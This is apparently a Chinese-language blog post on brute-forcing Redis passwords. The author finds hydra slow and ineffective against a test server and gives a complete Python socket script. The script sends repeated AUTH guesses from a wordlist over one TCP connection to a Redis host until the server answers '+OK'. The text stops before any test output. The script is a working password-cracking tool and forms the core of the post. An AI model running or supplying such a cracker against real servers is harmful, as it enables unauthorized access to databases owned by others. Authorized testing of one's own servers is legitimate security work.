redis密码破解(python使用socket模块)

         偶尔看到一篇讲述redis未授权访问漏洞的，提到用hydra进行redis密码的破解。测试了下，发现安装的hydra竟然无法破解出密码，且速度很慢（hydra版本 v8.2-dev）。

    如上图，用一个for循环生成个随机密码测试文件，将正确密码写入。

如上图，hydra竟然没破解出密码，不知道是不是bug，而且一分钟才运行差不多10000次密码猜测。而redis的配置文件里面提到redis能支持每秒150K的密码猜测。

 于是想用Python写个破解脚本。ipython下用socket模块测试了下，建立tcp连接后，auth认证成功，服务器会返回+ok，错误密码会返回“ERR，invalid password”：

代码如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 18-9-22 下午11:03
# @Site    : 
# @File    : redisCrack.py
# @Software: PyCharm

import socket
import sys

redisCrackFile="redisPass.txt"   #破解密码文件

ip="192.168.36.3"
port=6379
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))      #建立tcp连接
with open(redisCrackFile,"r") as f:
    for i in f:
        s.send("auth %s \n" %(i))    #在一个tcp连接里多次使用auth命令猜测
        authResult=s.recv(1024)
        if '+OK' in authResult:
            print "the redis pass is:%s" %i
            s.close()
            sys.exit(0)

测试如下：